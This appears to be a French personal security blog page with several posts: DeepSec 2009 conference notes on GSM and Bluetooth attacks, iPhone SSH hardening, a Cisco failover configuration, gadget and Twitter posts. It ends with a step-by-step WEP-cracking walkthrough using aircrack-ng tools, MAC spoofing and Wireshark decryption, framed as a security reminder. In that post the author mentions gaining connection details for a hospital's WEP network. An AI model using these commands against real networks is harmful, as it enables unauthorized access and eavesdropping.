Skip to main content
KAIZER ONION

DeepSec Day #4

Dernier jour de la conférence, on commence par Zane Lackey et Luis Miras de iSEC Partners qui nous présentent comment peut on prendre le contrôle d’un GSM à  distance en utilisant les SMS. Le principe est simple, on envoie une notification à  une personne pour un changement de paramètre, la personne accepte les nouveaux paramètres et vous obtenez toutes les informations que vous voulez. Techniquement c’est en modifiant le payload du SMS qu’ils arrivent à  insérer du code malicieux. Ils nous ont fait une petite démo live assez cool. Vous trouverez les slides de leur présentation ici. (ils avaient déjà  fait leur show à  la Black Hat cet été).

A croire que la journée était dédiée aux GSM, car le talk suivant présenté par Karsten Nohl, nous expliquait comment il était facile de décrypter l’encryption des communications GSM. Dans un premier temps, la méthode dite active consiste à  proposer au téléphone un relai avec un très bon signal afin de le forcer à  se connecter dessus (nécessite de la proximité). Une fois connecté, toutes les communications du téléphone peuvent être écoutées. La seconde méthode dite passive, n’est pas encore au point face à  l’encryption A5/1. Le principe est similaire à  du brute force à  l’aide de rainbows tables. D’ailleurs si vous souhaitez les aider dans leurs travaux, vous pouvez toujours proposer vos services en contactant Karsten Nohl. Ils possédent une mailing list pour rester au courant de leur progession et aussi un site web qui donne un peu plus d’explications sur leur recherche.

Le talk suivant présenté par Thorsten Schröder de Remote-Exploit.org portait sur l’écoute des communications de clavier Bluetooth. La présentation était très intéressant, notamment on y apprends que les claviers Bluetooth de Microsoft sont composés de puces AES qui leurs permettraient d’assurer une meilleure sécurité de la communication mais ils continuent d’utiliser une méthode basée sur des contrôles XOR. Il nous démontre, à  l’aide d’un petit émetteur Bluetooth fait maison, comment il arrive envoyer une série de commandes sur un récepteur Bluetooth Microsoft. Vous trouverez en ligne la démo ainsi que des explications sur la méthode utilisée.

bluetooth

Le dernier talk de la matinée présenté par deux italiens a définitivement clôturé les présentations intéressantes (du moins pour ma part). En effet, l’après midi n’était pas aussi intéressante en termes de sujet (les sujets abordés m’intéressais moins). Revenons à  la présentation des italiens, qui reprenait en grande partie les travaux de Zane et Luis mais d’une manière différente. Ils ont montré comment ils arrivent à  changer à  distance, via un SMS, l’APN du téléphone cible. Une fois l’APN changé (un APN proxy), ils arrivent à  voir toutes les trames HTTP et HTTPS du client. Le téléphone cible n’a plus aucun secret pour eux. Assez terrifiant …

deepsec

La conférence DeepSec édition 2009 s’est clôturée sur une soirée au Metalab ou tout le monde étaient conviés. C’était l’occasion pour lancer quelques lightening talk (des présentations de courte durée). Le sujet principal était le recensement des pirateries effectués durant la conférence à  l’hôtel :

  • Connexion internet pour 1 euros en utilisant un champ caché
  • La capture des trames TCP des caméras de surveillance sur un réseau sans fils non protégé
  • L’accès au menu de la TV payante de l’hôtel via un code disponible chez le constructeur

Un ver dans la pomme

Pour les personnes qui auraient jailbreakés leur iPhone et installés OpenSSH, je vous invite fortement à  suivre ce petit tuto.
Actuellement sur la toile tourne un ver qui impacte tous les iPhones jailbreakés qui ont installé openSSH. En effet, il utilise le mot de passe par défaut (alpine) du compte root pour se connecter à  votre iPhone via SSH et changer votre fond d’écran. A l’origine le ver a été conçu par un australien de 21 ans pour sensibiliser les utilisateurs à  la gravité de la faille de sécurité, mais depuis le ver a été repris et ne se contente plus de changer votre fond d’écran, il vous vole la liste de vos contacts, vos mails, vos SMS et tout autre donnée disponible. Pour éviter d’avoir sa liste de contacts sur le web, je vous recommande de changer le mot de passe du compte root et de bloquer l’accès à  SSH pour l’utilisateur mobile. D’un point de vue sécurité, l’idéal serait de bloquer l’accès direct au compte root et de créer un compte utilisateur autorisé à  se connecter au serveur SSH.

Dans un premier temps, changez le mot de passe du compte root en utilisant le terminal ou par SSH:

# passwd
New password:
Retype new password:

Ensuite, éditez le fichier de configuration de votre serveur SSH afin de bloquer l’accès au serveur pour le compte mobile :

# vi /etc/ssh/sshd_config

Allez à  la fin du document avec la commande “: $”, passez en mode édition avec “: i” puis insérez la ligne suivante :

DenyUsers mobile

Sauvegardez avec la commande “: wq”.

Et voilà  le tour est joué, votre iPhone est maintenant sécurisé.

DeepSec Day #1

Je suis actuellement à  la conférence Autrichienne DeepSec à  Vienne. Elle se déroule sur quatre jours dont les deux premiers jours sont dédiés aux Workshops. C’est ma première édition et je dois dire que je ne suis pas déçu. D’une part le cadre est fort agréable (la conférence s’est établie dans l’hôtel The Imperial Riding School Vienna), et d’autre part notre première journée c’est agréablement bien passée.

Concernant les Workshops, ce n’est pas moins de huit training qui sont proposés. Pour ma part j’ai suivi le workshop Web 2.0 Security – Advanced Attacks and Defense présenté par Vimal Patel & Prashant Thakar (Blueinfy Solutions Pvt. Ltd.). Les deux indiens connaissent bien le sujet et leur présentation est rodée. Les travaux pratiques sur le protocole AMF pour les applications Flex sont prometteurs, nous verront ça demain. Pour le reste, la plus part du temps, le contenu a pris des airs de refrain, mais la soirée fut très original.

shnitzel

Après une petit heure de piscine, nous avons été manger la célèbre Wiener Shnitzel dans un petit restaurant du centre. Accompagné d’un des organisateurs de la conférence, nous avons eu droit a une visite guidé quelque peu spéciale. En effet, nous nous sommes rendu dans le quartier 21 ou se loge une organisation connu sous le nom de quintessenz qui lutte pour la restauration des droits civils en termes d’informatique.

quartier21

Ils décernent chaque 25 Octobre des Big Brother Awards à  chaque organisation, société qui ne respectent pas les droits civils et la vie privée des gens. Autant vous le dire tout de suite ce sont des passionnés qui ne comptent pas leurs heures.

metalab

Autre endroit, autre style, nous nous sommes rendu dans un Hackerspaces. Nous avons eu le droit à  un petit tour du propriétaire et surtout à  une démonstration de la découpeuse au Laser. Ce lieu appelé le club-metalab, regorge d’appareil fait maison. Que ce soit un mur de verre illuminé programmable via une interface web, ou encore une mallette contenant trois hot spot wifi disséqués et inter connectés, ce ne sont pas les idées qui manquent. Les installations ont un style un peu underground assumé. Chaque personne que nous avons croisé avait une bouteille de Club-Mate à  la main, un breuvage qui apparemment les maintiens en éveille. Notre petit groupe de visiteur nocturne était bien content de rentrer après cette escapade.

deepsec

La virtualisation des cartes de fildélité

Récemment j’ai lu un article intéressant sur la personnalisation des codes barres au Japon.
J’en vois déjà  du fond de la classe me demander : “Mais de quel code barre parle t’on ?”.
Eh bien, il s’agit des codes barres qui se situent sur tous les produits que vous achetez dans le commerce. Dans le but de rendre plus agréable vos courses, une société américaine (barcoderevolution) commence à  vendre, à  qui le souhaite, des codes barres personnalisés.
Je profite de cette actualité pour rebondir sur le sujet tout en le dérivant d’un poil. Cela m’a fait penser au code barre des cartes de fidélité dont nous sommes nombreux à  en avoir plein le porte feuille (On prefèrerais plus de billets). Si, tout comme moi, vous en avez marre de vous balader avec plusieurs carte de fidélité, vous redoutez la question ultime de l’hôtesse de caisse : “Avez vous la carte du magasin?”. Car bientendu neuf fois sur dix vous ne l’avez pas car votre femme l’a prise. Mais rassurez vous ce temps est “quasi” révolu, il existe une application pour ça : Barcode.
Oui je dis quasi car cela ne fonctionne pas dans tous les magasins. A titre d’exemple, Décathlon et Leclerc ne sont pas sensible aux charmes de l’iPhone par contre Auchan ne lui résiste pas.
L’application est gratuite et simple d’utilisation. Vous entrez le nom du magasin et ensuite vous renseignez les numéros de votre carte de fidélité.

BarcodeBarcode2

Comment activer le menu Données Cellulaire sur un iPhone jailbroken

Comme beaucoup, vous avez remarqué que depuis le passage de votre iPhone en version 3.x, le menu Données cellulaires n’est plus disponible. Ceci peut être ennuyeux dans certains cas comme le mien car à  chaque restauration de mon iPhone le paramètre Nom du point d’accès (apn) est initialisé avec une valeur erronée. Voici un petit tutoriel qui explique comment activer le menu Données Cellulaire sur votre iPhone.

Prérequis :
– avoir un iPhone jailbroken (tutoriel pour jailbreak votre iPhone)
– avoir OpenSSH installé
– avoir un outil pour se connecter en scp sur votre iPhone (j’utilise Fugu sur Mac et Winscp sur Windows)
– avoir installé Plist Editor pour Windows

1. Première étape, connectez vous sur votre iPhone en utilisant Winscp ou Fugu pour Mac. Récupérez le fichier carrier.plist dans :

/System/Library/Carrier Bundles/XXX.bundle/carrier.plist

Pour les utilisateurs Mac :

2. Ouvrez le fichier en cliquant dessus et ajoutez l’entrée AllowEDGEEditing comme on peut le voir sur la copie d’écran.

apneditingmac

Pour les utilisateurs Windows :

2. Ouvrez le fichier carrier.plist avec Plist Editor et ajoutez les lignes suivantes :

edgeeditingwin

3. Sauvegardez les changements et copiez le fichier carrier.plist sur votre iPhone comme à  l’étape 1.

4. Une fois terminé, vous pouvez éditer les paramètres de votre apn en allant dans le menu Réglages\Général\Réseau\Réseau de données cellulaires :

apn

Cisco multiple ISP avec IP SLA

Récemment j’ai été confronté à  un problème de configuration sur un routeur Cisco 3845. L’objectif était simple, il fallait configurer du failover sur le routeur entre deux provider. D’un côté une ligne louée et de l’autre une connexion ADSL négociée à  partir du routeur. Si l’énoncé semble simple, le résultat n’est pas pour autant évident (surtout pour un expert Cisco comme moi).

Le premier requis est d’avoir la bonne version d’IOS installé, en l’occurrence la fonctionnalité ip sla est disponible à  partir de l’IOS 12.4 avec le feature set advanced IP services ou advanced security. Pour rappel, vous trouverez la procédure pour mettre à  jour un IOS Cisco ici. Voici un petit schéma qui reprends l’énoncé précédent.

Cisco IP SLA
Cisco IP SLA

Voici la configuration nécessaire au bon fonctionnement de votre loadbalancing :

hostname Router_Name
!
ip cef
!
!#### Définir les objets de tracking. Ces objets sont utilisés pour ####!
!#### vérifier la disponibilité d’un host sur chaque ISP ####!
!
ip sla 1
icmp-echo 1.1.1.2 source-ip 1.1.1.1
frequency 30
ip sla schedule 1 start-time now life forever
!
ip sla 2
icmp-echo 2.2.2.3 source-ip 2.2.2.2
frequency 30
ip sla schedule 2 start-time now life forever
!
!#### Configurer les objets de tracking (cf. IP SLA) ####!
!
track 101 rtr 1 reachability
track 102 rtr 2 reachability
!
!#### Configuration des différentes interfaces ####!
!
interface GigabitEthernet0/0
description Internal connection
ip address 192.168.1.1 255.255.255.0
no ip redirects
no ip unreachables
no ip proxy-arp
ip flow ingress
ip nat inside
ip virtual-reassembly
duplex auto
speed auto
media-type rj45
no mop enabled
!
interface GigabitEthernet0/1
description ADSL connection
no ip address
no ip redirects
no ip unreachables
no ip proxy-arp
ip flow ingress
duplex auto
speed auto
media-type rj45
pppoe enable
pppoe-client dial-pool-number 1
no mop enabled
!
interface FastEthernet0/1/0
switchport access vlan 3
!
interface FastEthernet0/1/1
!
interface FastEthernet0/1/2
!
interface FastEthernet0/1/3
!
interface Vlan3
description Lease Line
ip address 1.1.1.1 255.255.255.248
ip nat outside
ip virtual-reassembly
!
interface Dialer0
ip address negotiated
no ip redirects
no ip unreachables
no ip proxy-arp
ip mtu 1492
ip flow ingress
ip nat outside
ip virtual-reassembly
encapsulation ppp
ip tcp adjust-mss 1412
dialer pool 1
dialer-group 1
ppp authentication pap callin
ppp pap sent-username user password 5 5s454f654r64v4br5t4bvr4
!
!#### Définition des routes en fonction des objets de tracking ####!
!#### dans notre, nous avons une configuration de load balancing ####!
!#### mais on pourrait définir une priorité sur une route pour éviter le loadbalancing ####!
!
ip route 0.0.0.0 0.0.0.0 vlan3 track 101
ip route 0.0.0.0 0.0.0.0 dialer0 track 102
!
!#### Configurer le NAT pour le trafic entrant ####!
!
ip nat inside source route-map ISP1 interface vlan3 overload
ip nat inside source route-map ISP2 interface dialer0 overload
!
!#### Configuration du NAT pour du traffic VPN entrant ####!
!
ip nat inside source static udp 192.168.1.1 500 1.1.1.1 500 route-map ISP1 extendable
ip nat inside source static udp 192.168.1.1 500 2.2.2.2 500 route-map ISP2 extendable
ip nat inside source static 192.168.1.1 1.1.1.1 route-map ISP1 extendable
ip nat inside source static 192.168.1.1 2.2.2.2 route-map ISP2 extendable
!
!#### Configuration des route maps en référence à  la configuration du NAT ####!
!
route-map ISP1 permit 100
match interface vlan3
!
route-map ISP2 permit 100
match interface dialer0
!

Sources :
http://www.blindhog.net/cisco-dual-internet-connections-without-bgp
http://hypergressive.blogspot.com/2009/03/dual-isp-load-balancing-configuration.html

Hack.lu, la defcon Luxembourgeoise

Comme chaque année en octobre, c’est la grande messe de la sécurité informatique qui se déroule le 28-30 Octobre à  Luxembourg. Pour la deuxième année consécutive, dartalis (mon employeur) sponsorise l’événement.
Cette année s’annonce être un bon cru au vu des speakers retenus par les membres de l’association. Pour en citer quelques uns, il y aura Matt Suiche avec une présentation intéressante de son outil win32dd qui permet de faire un dump de la mémoire physique de votre windows vista. Il y aura aussi le duo Daniele Bianco et Andrea Barisani avec leur présentation sur l’émanation d’ondes des claviers. Notons également la présence de Saumil Shah qui l’année passée avait fait une superbe présentation sur la sécurité des navigateurs web. Le premier jour de la conférence sera dédié aux Workshops, avec deux sessions simultanées. La première, Bypassing the Perimeter: Client Side Exploitation sera présenté par Nitesh Dhanjani et Billy K Rios, et la seconde parlera de DAVIX Visualisation et sera présenté par Jan P. Monsch.
Maintenant le mieux pour se faire un avis c’est d’y participer, alors rdv là  bas !! En attendant vous pouvez suivre les news sur leur site web : hack.lu ou comme moi sur twitter

Twitter was down

La fin du monde est arrivée, 64 ans après l’explosion de la première bombe atomique. Il semblerait qu’un groupe de pirate a effectué un DoS (Deni of Service) sur les serveurs de Twitter. Je dois avouer que hier je me suis senti un peu coupé du monde. Comment partager aussi rapidement et massivement mes dernières infos, impressions, humeurs avec le monde. La seule fonctionnalité non touché par l’attaque était Twitter search. Ceci dit, cela nous a permis d’être spectateur de l’attaque sans pour autant pouvoir agir. A croire que cela était fait exprès, digne du Marquis de Sade.

Je me suis dit qu’il pouvait être utile d’avoir un plan de secours des activités possible lorsque Twitter n’est plus là  :
0. Travailler
1. Discuter à  propos de Twitter sur FriendFeed
2. Discuter à  propos de Twitter sur Facebook
3. Discuter à  propos de Twitter sur MSN
4. Laisser un commentaire sur un blog au sujet de Twitter
5. Discuter de Twitter via SMS
6. Discuter de Twitter via Mail
7. Ecrire un article sur Twitter
8. Penser à  propos de Twitter
9. Rêver aux prochains tweets que vous allez poster
10. Sortir dehors

Si vous avez d’autres idées, n’hésitez pas.

Mise à  jour le 08/08/2009 10:27

Be a Hero

Après mon séjour au Mondial du VTT aux 2 Alpes, je suis revenu avec une idée en tête : “Acheter une caméra embarquée”.
Désormais, c’est chose faite. Il s’agit de la caméra GoPro. Facile à  utiliser et à  fixer, voici dans les grandes lignes les qualités techniques de la bête :

  • Résolution: 5 megapixel (2592×1944) photo, 512×384 video
  • Format vidéo: MJPEG, 30 images/seconde
  • Optique: optique en verre, f/2.8 ouverture, avec un angle de vue de 170º
  • Modes: vidéo, standard photo, photo toute les 2 ou 5 secondes, 3 photos en 1 seconde en mode rafale, retardateur, possibilité d’inverser la prise de vue
  • Retardateur: 10 secondes
  • Micro: intégré mais pas terrible
  • Format audio: 8kHz, mono
  • Memoire: 16 MB interne, extensible à  4GB avec une SD (soit 110 minutes d’enregistrement)
  • Capacité: 56 minutes de vidéo ou 1,945 photos avec une SD de 2GB. Et 1h52min de vidéo avec une SD de 4GB.
  • Alimentation: 2x AAA batteries pour 3heures d’enregistrement avec des piles au lithium
  • Connexion TV (avec cabe RCA): NTSC ou PAL
  • Connexion PC: USB + RCA combo cable
  • Compatible avec: Windows ME, 2000, XP, et Vista; Mac OS X 10.2 et plus
  • Waterproof: jusqu’à  30 mètres
  • Dimensions: 4.45cm x 5.84cm x 3.18cm (H x L x P)
  • Poids: 139 g

Personnellement, je l’ai acheté sur eBay.com pour le prix de 148 euros TTC frais de port compris. Si vous êtes intéressé, le vendeur en a encore à  cette adresse.

GoPro Hero Wide
Le soir même de la reception du colis, je n’ai pu m’empêcher d’aller essayer mon nouveau joujou … Pour le coup, j’étais un peu trop préssé et le cadrage n’était pas au top mais cela m’a permit de visualiser la qualité de la caméra. Je vous laisse regarder cette petite vidéo en moto.

https://youtube.com/watch?v=hDuUb5Sgsao%26hl%3Dfr%26fs%3D1%26

Une fois testé sur la moto, il a fallu que je teste sur le vélo. Accompagné de Matt et Bruno pour un ride sans prise de tête. Je tiens à  préciser que vous allez voir mon premier passage sur le Road Gap de la descente d’Algrange. Pour les personnes qui ne connaissent pas, c’est un saut au dessus d’un passage de voiture.

https://youtube.com/watch?v=rAwPmGpSLpE%26hl%3Dfr%26fs%3D1%26

Et une voici la seconde vidéo, cette fois complète, de la descente d’Algrange.

https://youtube.com/watch?v=727m278pVq8%26hl%3Dfr%26fs%3D1%26

Si vous avez des remarques, n’hésitez pas.

Wifi / Hara-kiri (Seppuku)

Cette semaine j’ai été surpris d’apercevoir, dans un centre hospitalier, un spot wifi (professionnel) avec du WEP. Même si il y avait du filtrage par adresse mac et le service DHCP était coupé, cela m’a pris quelques minutes supplémentaires pour obtenir toutes les informations nécessaires à  la connexion de ce réseau… Alors je me suis dit qu’un petit rappel sur la sécurité des réseaux wifi pourrait être utile afin d’éviter l’hara-kiri.

Actuellement nous avons les différents types d’authentification suivants :

  • WEP Open ou Shared Key
  • WPA PSK avec encryption TKIP ou AES
  • WPA Enterprise avec encryption TKIP ou AES
  • WPA2 PSK avec encryption TKIP ou AES
  • WPA2 Enterprise avec encryption TKIP ou AES
  • 802.1x

Sur ces différents modes d’authentification, il y a bien entendu le WEP qui est complètement obsolète, et le protocole d’encryption TKIP qui contient des faiblesses découvertes par deux chercheurs allemands en novembre 2008.
Je ne vais pas refaire une biographie complète du WEP car il en existe déjà  beaucoup sur internet. Mais je vais vous montrer (à  nouveau car pour certain ce n’est pas clair visiblement) comment il est facile de casser une clé WEP.

Personnellement j’utilise le live CD backtrack 4 qui contient tous les outils nécessaires pour notre démo.

Pour la suite de la démonstration, on prendra pour acquis les éléments suivants :

  • MAC adresse du point d’accès cible : 00:CA:FE:BA:BE:FF
  • MAC adresse du client connecté sur le point d’accès : 00:BA:BE:CA:FE:FF
  • BSSID du point d’accès cible : POVWEP
  • Dans un premier temps, je mets ma carte wifi en mode monitor :

    airmon-ng start wlan0

    Puis je lance airodump-ng, il permet de scanner les réseaux wifi. Airodump-ng est simple d’utilisation.

    Usage: airodump-ng

    Airodump-ng offre une multitude d’options et de filtres afin de cibler ce que l’on souhaite surveiller.

    Options airodump-ng:

    -w permet de créer un fichier de capture dans lequel seront enregistrés tous les paquets.
    Exemple: airodump-ng -w out wlan0

    –encrypt permet de filtrer les réseaux en fonction du type d’encryption utilisé.
    Exemple: airodump-ng –encrypt wep wlan0 (seuls les réseaux en WEP seront affichés)

    -c permet de cibler l’écoute sur un canal wifi particulier.
    Exemple: airodump-ng -c 10 wlan0 (airodump-ng n’écoutera que le canal 10)

    –bssid permet de ne cibler qu’un seul point d’accès en fonction de son adresse mac.
    Exemple: airodump-ng –bssid 00:CA:FE:BA:BE:FF wlan0 (airodump-ng ne surveillera que le point d’accès dont l’adresse mac est 00:CA:FE:BA:BE:3F)

    Donc si je veux faire un tour d’horizon ce que qui ce passe dans le coin, je lance :

    airodump-ng wlan0

    Je peux apercevoir que le point d’accès 00:CA:FE:BA:BE:FF a du WEP et un client connecté. Parfait, nous pouvons commencer. On lance un autre airodump qui va créer un fichier de capture. Ce fichier de capture sera utilisé par aireplay pour rejouer les ARP (injections de paquets).

    airodump-ng -w out -c 10 –bssid 00:CA:FE:BA:BE:FF wlan0

    Maintenant que nous sommes focalisé sur notre point d’accès et que nous avons un client connecté, nous pouvons tenter de nous associer au point d’accès avec aireplay :

    aireplay-ng

    Voici les différentes options de aireplay :

    –deauth count : deauthenticate 1 or all stations (-0)
    –fakeauth delay : fake authentication with AP (-1)
    –interactive : interactive frame selection (-2)
    –arpreplay : standard ARP-request replay (-3)
    –chopchop : decrypt/chopchop WEP packet (-4)
    –fragment : generates valid keystream (-5)
    –caffe-latte : query a client for new IVs (-6)
    –cfrag : fragments against a client (-7)
    –test : tests injection and quality (-9)

    On utilise l’option -1 fakeauth (association & authentification) pour notre test :

    aireplay-ng -1 0 -e POVWEP -a 00:CA:FE:BA:BE:FF -b 00:CA:FE:BA:BE:FF -h 00:BA:BE:CA:FE:FF wlan0

    POVWEP: essid (nom du réseau wifi)

    00:CA:FE:BA:BE:FF: adresse mac du point d’accès

    00:BA:BE:CA:FE:FF: adresse mac du client (“station” sous airodump-ng)

    wlan0: notre interface wifi

    Maintenant nous pouvons lancer notre attaque par rejeux d’ARP (injection de paquets). On utilise l’option -3 standard ARP-request replay (rejeu d’arp) :

    aireplay-ng -3 -e Livebox-a1b2 -a 00:CA:FE:BA:BE:FF -b 00:CA:FE:BA:BE:FF -h 00:BA:BE:CA:FE:FF -x 600 -r out-01.cap wlan0

    POVWEP: essid (nom du réseau wifi)

    00:CA:FE:BA:BE:FF: adresse mac du point d’accès

    00:BA:BE:CA:FE:FF: adresse mac du client (“station” sous airodump-ng)

    600: nombre de paquets par secondes qui seront injectés (à  régler en fonction de la qualité du signal wifi)

    out-01.cap: notre fichier de capture airodump-ng

    wlan0: notre interface wifi

    Il ne reste plus qu’attendre afin d’obtenir 40000 ARP pour décrypter la clé WEP. Une fois vos 40000 ARP dans votre fichier de capture, il ne reste plus qu’à  décrypter la clé à  l’aide de aircrack.

    Aircrack-ng est très simple d’utilisation.

    usage: aircrack-ng [options] <.cap / .ivs file(s)>

    Dans notre cas, nous allons utiliser la commande suivante :

    aircrack-ng out-01.cap

    Quelques minutes après vous pourrez voir :

    KEY FOUND! [ FA:E6:18:26:27:56:B5:4D:C5:31:40:71:56 ]

    Maintenant si le réseau fait du filtrage par MAC adresse vous avez déjà  un mac adresse de disponible, utilisez là  :

    ifconfig wlan0 hw ether 00:BA:BE:CA:FE:FF

    Et si le service DHCP n’est pas activé, vous pouvez utiliser wireshark afin de définir l’adressage du réseau. Commencez par lancer wireshark.
    Puis configurer wireshark pour qu’il décrypte les paquets avec la clé WEP que vous venez juste de décrypter.

    Allez dans Edit\preferences\protocols\IEEE 802.11
    puis entrer la clé WEP
    Cochez Assume packets have FCS et enable decryption

    Screenshot-Wireshark: Preferences

    Vous pouvez commencer à  sniffer en allant dans capture\options

    Screenshot-Wireshark: Capture Options

    Si vous voulez être plus granulaire dans votre recherche vous pouvez faire un filtre sur votre point d’accès :

    (wlan.bssid==00:CA:FE:BA:BE:FF) && (tcp)

    Screenshot-The Wireshark Network Analyzer

    Vous allez découvrir des choses intéressantes.

    Deux formules à  retenir (dont une que j’empreinte à  sid) :

    WPA != PSK + TKIP
    WIFI != WEP